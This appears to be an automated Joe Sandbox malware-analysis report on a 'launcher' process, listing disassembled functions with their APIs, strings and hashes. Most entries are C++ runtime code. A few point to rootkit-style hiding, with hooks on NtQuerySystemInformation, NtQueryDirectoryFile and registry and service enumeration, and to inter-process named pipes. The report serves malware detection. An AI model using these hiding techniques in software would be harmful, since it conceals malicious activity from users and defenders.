API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$??0?$basic_ios@?pptr@?$basic_streambuf@D@std@@@1@@$??0?$basic_iostream@??0?$basic_istream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_istream@??6?$basic_ostream@?epptr@?$basic_streambuf@?exceptions@ios_base@std@@?setstate@?$basic_ios@D@std@@@1@_V01@memset
String ID:
API String ID: 1158059333-0
Opcode ID: 4ae8df1f0c41a02b9fb432e0c0d8171f45d1d75108036e5f813b93344ee2428b
Instruction ID: 9f0d87aa4f1147dfe5014984acfdd4a37e38b2d3a1dec1da013cf8fc80077236
Opcode Fuzzy Hash: 4ae8df1f0c41a02b9fb432e0c0d8171f45d1d75108036e5f813b93344ee2428b
Instruction Fuzzy Hash: 7D913D33639AC595EA20EB10E4943EEE360FBD5744FA44131DA8E47A69DF3CE549CB20

Function 000001EDF1661EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001EDF1661EBF

Part of subcall function 000001EDF1662174: GetModuleHandleA.KERNEL32 ref: 000001EDF166218C
Part of subcall function 000001EDF1662174: GetProcAddress.KERNEL32 ref: 000001EDF166219D

Part of subcall function 000001EDF1665C10: GetCurrentThreadId.KERNEL32 ref: 000001EDF1665C4B

Strings

NtResumeThread, xrefs: 000001EDF1661F02
NtEnumerateKey, xrefs: 000001EDF1661F59
EnumServicesStatusExW, xrefs: 000001EDF1661FB1, 000001EDF1661FD2
advapi32.dll, xrefs: 000001EDF1661F97, 000001EDF1661FB8
EnumServiceGroupW, xrefs: 000001EDF1661F90
NtDeviceIoControlFile, xrefs: 000001EDF1661FF6
sechost.dll, xrefs: 000001EDF1661FD9
NtQueryDirectoryFileEx, xrefs: 000001EDF1661F3C
NtQuerySystemInformation, xrefs: 000001EDF1661EE5
NtQueryDirectoryFile, xrefs: 000001EDF1661F1F
NtEnumerateValueKey, xrefs: 000001EDF1661F76
ntdll.dll, xrefs: 000001EDF1661ECD

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: bc2a4e38332703f31515408b9453b3995ade414b3bd58ac07dfbb9206cc937f0
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 6531A3782109CAA0FB04EF75F9516DC73A1B786349F84462BAD1B1A1A79E3CC25FC380

Function 00007FF77E08E1A0 Relevance: 19.7, APIs: 13, Instructions: 157COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E1CF
??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E1E9
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E222
std::_Facet_Register.LIBCPMT ref: 00007FF77E08E283
??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E2B3
??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E2C4
??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E2DE
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E311
?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E33E
std::_Facet_Register.LIBCPMT ref: 00007FF77E08E373
??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E3A8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E08E3DA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E08E3E0

Part of subcall function 00007FF77E0947C0: char_traits.LIBCPMTD ref: 00007FF77E094835
Part of subcall function 00007FF77E0947C0: ??0_Locinfo@std@@QEAA@PEBD@Z.MSVCP140 ref: 00007FF77E0948E1
Part of subcall function 00007FF77E0947C0: ??0facet@locale@std@@IEAA@_K@Z.MSVCP140 ref: 00007FF77E0948F9
Part of subcall function 00007FF77E0947C0: ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@@XZ.MSVCP140 ref: 00007FF77E094912
Part of subcall function 00007FF77E0947C0: ??1_Locinfo@std@@QEAA@XZ.MSVCP140 ref: 00007FF77E094934

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Locinfo@std@@$Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getgloballocale@locale@std@@Locimp@12@Registerstd::_$??0facet@locale@std@@Collvec@@D@std@@Getcat@?$ctype@Getcoll@_V42@@Vfacet@locale@2@char_traits
String ID:
API String ID: 1667949865-0
Opcode ID: d2468a580f40cca8f4a1142334b2f7d86296ade14d121569b61c58758b1010b2
Instruction ID: b4a1c77ed4fbc1be3578044454cfd54b00a9717e568c50ebd83e4aaf9986de4e
Opcode Fuzzy Hash: d2468a580f40cca8f4a1142334b2f7d86296ade14d121569b61c58758b1010b2
Instruction Fuzzy Hash: 45618323638A4195EA14EF11E85417DF360FB94B90FA81531EA9E437A5DF3CF546C720

Function 00007FF77E08EC90 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEC8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EED8
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EEE9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEF2

Strings

invalid number; expected digit after '.', xrefs: 00007FF77E08EE0A
invalid number; expected '+', '-', or digit after exponent, xrefs: 00007FF77E08EEA0

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: _errno$Concurrency::details::EmptyQueue::StructuredWorkstrtoull
String ID: invalid number; expected '+', '-', or digit after exponent$invalid number; expected digit after '.'
API String ID: 34875580-808606891
Opcode ID: 58fa387fd6cc284815c22c2c9be5a35531a406fc7ecf86948a4be093d5809962
Instruction ID: 2903b15b9bcf53fc22c869cd35ec2366bf967df419f854837f5e45443660605d
Opcode Fuzzy Hash: 58fa387fd6cc284815c22c2c9be5a35531a406fc7ecf86948a4be093d5809962
Instruction Fuzzy Hash: B3418F23A3C65681EB24BF24A85027DB3A0FF45B98FA44135E94D4779ADE2CF846C770

Function 000001EDF16623F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001EDF1662405
GetCurrentProcessId.KERNEL32 ref: 000001EDF166240F

Part of subcall function 000001EDF16619AC: OpenProcess.KERNEL32 ref: 000001EDF16619CA
Part of subcall function 000001EDF16619AC: IsWow64Process.KERNEL32 ref: 000001EDF16619E0
Part of subcall function 000001EDF16619AC: CloseHandle.KERNEL32 ref: 000001EDF16619FB

CreateFileW.KERNEL32 ref: 000001EDF1662468
WriteFile.KERNEL32 ref: 000001EDF1662490
ReadFile.KERNEL32 ref: 000001EDF16624AF
CloseHandle.KERNEL32 ref: 000001EDF16624B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000001EDF1662438
\\.\pipe\dialerchildproc32, xrefs: 000001EDF166243F

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: e4c1bde9ac2e632e7e71497902364f67f4f6c5cfb8324a05b953c14dada0d0b2
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 3A211836614A8083EB10DB35F54439E77E0F78ABA9F544315EE5A06BAADF3CC14ACB01

Function 00007FF77E0840F0 Relevance: 13.7, APIs: 9, Instructions: 225COMMON

Download Yara Rule

APIs

?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF77E084186
?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF77E0841B1
?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF77E0841DE
?flags@ios_base@std@@QEBAHXZ.MSVCP140 ref: 00007FF77E08425E
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77E0842F6
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF77E0843A0
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77E084458
?width@ios_base@std@@QEAA_J_J@Z.MSVCP140 ref: 00007FF77E0844E1
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF77E08451E

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ?width@ios_base@std@@D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
String ID:
API String ID: 72653192-0
Opcode ID: 331068fb59e288863a4f4513dc865f8426cc57d2389fc4c73ef87186809fd8eb
Instruction ID: 66317464d9747829694019106233790a1b36659d2fff7bf46922ea0ce1308a14
Opcode Fuzzy Hash: 331068fb59e288863a4f4513dc865f8426cc57d2389fc4c73ef87186809fd8eb
Instruction Fuzzy Hash: 5FC1D53762DBC989DB709B19E4813AEB7A0F789B84F504526EA9D43B68DF7CD440CB10

Function 00007FF77E0850B0 Relevance: 13.7, APIs: 9, Instructions: 211COMMON

Download Yara Rule

APIs

?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF77E085100
?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF77E08512B
?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF77E085166
?flags@ios_base@std@@QEBAHXZ.MSVCP140 ref: 00007FF77E0851D4
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77E08526C
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF77E085310
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77E0853B6
?width@ios_base@std@@QEAA_J_J@Z.MSVCP140 ref: 00007FF77E08543F
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF77E08547C

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ?width@ios_base@std@@D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
String ID:
API String ID: 72653192-0
Opcode ID: f1c1a9f63ecc108f5a757690fdad687d1b789592d9b60c4594a90739469f625c
Instruction ID: 9e86dbdeda49d9e43ba71b384bdd1c6c72b6b7a251a8ded849c1af0a71f7ef2d
Opcode Fuzzy Hash: f1c1a9f63ecc108f5a757690fdad687d1b789592d9b60c4594a90739469f625c
Instruction Fuzzy Hash: C5B1C82762CBC585DB70DB19E49036EB7A0F789B84F508526EA8E43B69DF7CE440CB10

Function 00007FF77E08AFD0 Relevance: 13.6, APIs: 9, Instructions: 139COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E08B01D

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: f7c106f0c4a44a12f261ab7c8d5580a56bfd8c267a2fc831ad0378b7958c8ecc
Instruction ID: dd9f85f19c52791464621ed8ae60717b8aaf3f95e8fc640e6d14fccda96227b4
Opcode Fuzzy Hash: f7c106f0c4a44a12f261ab7c8d5580a56bfd8c267a2fc831ad0378b7958c8ecc
Instruction Fuzzy Hash: DC51B327A3864186EA20AB25E555179E7A0FB84B84FE40131EA5D47B96DF3CF055CB20

Function 000001EDF166104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001EDF16610AB
RegEnumValueW.ADVAPI32 ref: 000001EDF166110E
GetProcessHeap.KERNEL32 ref: 000001EDF1661155
HeapAlloc.KERNEL32 ref: 000001EDF1661163
GetProcessHeap.KERNEL32 ref: 000001EDF1661187
HeapFree.KERNEL32 ref: 000001EDF1661195

Strings

d, xrefs: 000001EDF16610CE

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 6e3aff5b7c545bb083fa75c83c709e7d57e07a6a174a0c13777122d555a138b3
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 91413C32614B80D7E764CF62F44479EB7A1F389B95F008225DF8A0BA5ADF38D566CB00

Function 000001EDF16675F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001EDF1667618
__scrt_acquire_startup_lock.LIBCMT ref: 000001EDF166766A
_RTC_Initialize.LIBCMT ref: 000001EDF1667698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001EDF16676BE
__scrt_release_startup_lock.LIBCMT ref: 000001EDF16676E9

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 3f94fe4b7bd5594995873892b88e4759d5b371f0ac8c9f12a35002adc6293d09
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: A2817D317146C186FA64EB79F8613ED66D0AB87B90F1846299E0B8F797DF38C8478700

Function 000001EDF16369F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001EDF1636A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001EDF1636A6A
_RTC_Initialize.LIBCMT ref: 000001EDF1636A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001EDF1636ABE
__scrt_release_startup_lock.LIBCMT ref: 000001EDF1636AE9

Memory Dump Source

Source File: 00000006.00000002.3728534436.000001EDF1630000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001EDF1630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1630000_launcher.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: aeaa34008787b2c0a8070ee6dc0d060fb3472cfd517e86b7a9dc68c7276e9b38
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 7081AE31A006D586FB64EB3AF8413DD66D1EB87784F548029AE0B47797DB39CAC78700

Function 00007FF77E08B1E0 Relevance: 12.0, APIs: 8, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08B202
?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08B210
?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08B218
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08B224
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08B230
allocator.LIBCONCRTD ref: 00007FF77E08B248
?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAD00@Z.MSVCP140 ref: 00007FF77E08B258
?setp@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAD0@Z.MSVCP140 ref: 00007FF77E08B266

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?epptr@?$basic_streambuf@?pptr@?$basic_streambuf@?setg@?$basic_streambuf@?setp@?$basic_streambuf@D00@allocator
String ID:
API String ID: 4248052844-0
Opcode ID: c0ba57264eb2f6f23706f504f931553d39bb4e75cf2900468184058ce3dd923b
Instruction ID: e3f7c274f220965434a5b1f4a61b0535169032e4a6a52fa74b23f744140352da
Opcode Fuzzy Hash: c0ba57264eb2f6f23706f504f931553d39bb4e75cf2900468184058ce3dd923b
Instruction Fuzzy Hash: 85114F27A38B4681EA14AB6AA81523DE260EF85F95FA80130DE0E02765DF3CF045C720

Function 00007FF77E090A40 Relevance: 10.6, APIs: 7, Instructions: 108COMMON

Download Yara Rule

APIs

_Max_value.LIBCPMTD ref: 00007FF77E090A8A
_Min_value.LIBCPMTD ref: 00007FF77E090AA9

Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E0949B6
Part of subcall function 00007FF77E094970: _Min_value.LIBCPMTD ref: 00007FF77E0949D5
Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E094A13

memcpy.VCRUNTIME140 ref: 00007FF77E090B30
memcpy.VCRUNTIME140 ref: 00007FF77E090B3E
memcpy.VCRUNTIME140 ref: 00007FF77E090B5E
memcpy.VCRUNTIME140 ref: 00007FF77E090B6C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E090BA8

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: memcpy$Max_value$Min_value$Concurrency::cancel_current_task
String ID:
API String ID: 1450429804-0
Opcode ID: a889a1bb1dc41712f4887da271668cd504c2f7b0b1af99ec655419ceb0636286
Instruction ID: d44a59be993f29dcd6c785f0ba03f5a7830aa882d4e5e696013f9303619d1411
Opcode Fuzzy Hash: a889a1bb1dc41712f4887da271668cd504c2f7b0b1af99ec655419ceb0636286
Instruction Fuzzy Hash: 24315B23738A8595EA10EF12E8502AAB360FB84FD8F944632EE9D47B95DF3CE155C710

Function 000001EDF1669804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001EDF1669889
GetLastError.KERNEL32 ref: 000001EDF1669897
LoadLibraryExW.KERNEL32 ref: 000001EDF16698C1
FreeLibrary.KERNEL32 ref: 000001EDF1669907
GetProcAddress.KERNEL32 ref: 000001EDF1669913

Strings

api-ms-, xrefs: 000001EDF16698A9

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: b6a08ee61b59c9b2b51e1b3aa20e284fb3261dedc106f0c5a337e5604a01a85e
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 8F316D31216AD195EE12DB22F8107DD63E4BB4ABA0F5A4629AD2F4A397DE38C446C300

Function 00007FF77E08AB90 Relevance: 10.6, APIs: 7, Instructions: 88COMMON

Download Yara Rule

APIs

?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08ABB6
?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08ABCC
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08ABE7
?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAD00@Z.MSVCP140 ref: 00007FF77E08AC37
?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08AC4B
fpos.LIBCPMTD ref: 00007FF77E08AC6E
fpos.LIBCPMTD ref: 00007FF77E08AC84

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$fpos$?eback@?$basic_streambuf@?epptr@?$basic_streambuf@?gptr@?$basic_streambuf@?pptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
String ID:
API String ID: 1423567473-0
Opcode ID: 2589adf57cf5125635c78ff1d6c3b34d01f8c006659679e613ccfc35d637eb52
Instruction ID: 6019d1e6c89a69e756cad619b586083b535055c677bfa2e870d355f062f9dcb4
Opcode Fuzzy Hash: 2589adf57cf5125635c78ff1d6c3b34d01f8c006659679e613ccfc35d637eb52
Instruction Fuzzy Hash: 93317133A39A4242FB95AF26A80563A96A1EF44FE4FB40131DD1D07B95EE3DF491C220

Function 00007FF77E08AE10 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08AE1D
?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08AE3D

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

